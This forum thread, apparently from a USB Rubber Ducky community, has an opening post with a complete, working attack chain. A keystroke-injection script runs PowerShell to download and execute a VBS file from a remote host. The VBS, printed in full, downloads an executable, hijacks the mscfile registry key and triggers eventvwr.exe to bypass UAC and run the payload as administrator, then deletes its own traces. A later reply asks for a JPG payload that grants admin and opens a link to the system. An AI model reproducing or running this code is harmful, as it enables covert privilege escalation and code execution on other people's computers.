Jump to content

2-4 second download + execute with UAC Bypass/exploit. Almost no windows displayed


Recommended Posts


This is my first post and contribute to this community, one of hopefully many. 

I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go.

I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time.

DELAY 1000
STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" 

Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time)

To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away.

This is the script.txt (run.vbs when saved)

Sub Main()
'Setting some vars
fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"
filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe"

'Download function
dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
strlink = fileurl
strsaveto = filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1 
        .write objhttpdownload.responsebody
        .savetofile strsaveto
   end with
   set objstreamdownload = nothing
end if

'UAC bypass/exploit setup
Set WshShell = CreateObject("WScript.Shell")
myKey = "HKCU\Software\Classes\mscfile\shell\open\command\"
WshShell.RegWrite myKey,filename ,"REG_SZ"

'UAC bypass/exploit trigger
CreateObject("WScript.Shell").Run "eventvwr.exe"

WScript.Sleep 1000

'UAC bypass/exploit cleanup
Set objShell = Wscript.CreateObject("Wscript.Shell")
objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"

'Cleanup removal of this script after completed
Set Cleanup = WScript.CreateObject("WScript.Shell")
Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True

End Sub 

'We dont want to display any errors
On Error Resume Next
  If Err.Number Then
     'on error cleanup and exit
     set Cleanup = WScript.CreateObject("WScript.Shell")
     Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
     WScript.Quit 4711
End If

I have commented this to my best ability. its pretty straight forward and is about 2kb in size

It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user.

It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace.

If any point we get an error we also remove the script. . 

This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. 

I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. 

Best Regards


Link to comment
Share on other sites

  • 10 months later...

I am new and learning the question maybe dumb but can you or is there a ducky version that is strictly a payload as a jpg so when clicked on it automatically gives admin status and establishes link to system.

I am thinking of building a 8 unit cluster of raspberry pie 3 to explore rapid pin testing is this advisable?

Link to comment
Share on other sites

  • 4 years later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...